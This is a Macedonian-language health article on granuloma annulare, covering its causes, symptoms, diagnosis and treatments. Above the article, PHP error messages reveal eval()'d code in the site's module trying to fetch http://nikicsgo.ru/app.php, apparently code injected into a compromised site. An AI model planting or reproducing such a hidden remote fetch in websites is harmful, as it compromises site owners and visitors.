Прстенест гранулом (Granuloma annulare) | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).

Прстенест гранулом (Granuloma annulare)

Автор:

д-р Милан Чакаровски




Ануларниот или прстенест гранулом е доста честа грануломатозна реакција која се карактеризира со појава на инфилтрати со подигнати рабови, па таквите лезии имаат прстенест изглед.



Причини за настанување



Етиологијата на болеста не е позната.

Се верува дека влијание имаат ултравиолетовите зраци. Често кај генерализираните облици се приметува поврзаност со HLA-B35.



Клиничка слика



Клинички, особено често на рачните и скочните зглобови и прстите се гледаат лесно елевирани (подигнати), обично црвеникаво-виолетови инфилтрати со големина од 1-2 см во пречник, со беличаст подигнат раб широк 1-2 мм. Промените се асимптоматски. Можни се и улцерации, но мошне ретко. Кај генерализираните облици се гледаат по трупот и екстремитетите црвеникаво-синкасти папули, без прстенести рабови. Овој облик се јавува почесто отколку кај болните со дијабетес мелитус.



Дијагноза



Се поставувa врз основа на анамнезата, клиничката слика, прегледот и патохистолошкиот наод.



Лекување



Терапијата кај малубројните промени се спорведува со примена на кортикостероидни масти со помош нa оклузија, интралезионална апликација на triamcinolon acetonid или криотерапија.

Кај дисеминираните (расеаните) облици се применува izoniazid или chlorambucil.

ЗА ЗДРАВЈЕ NEWSLETTER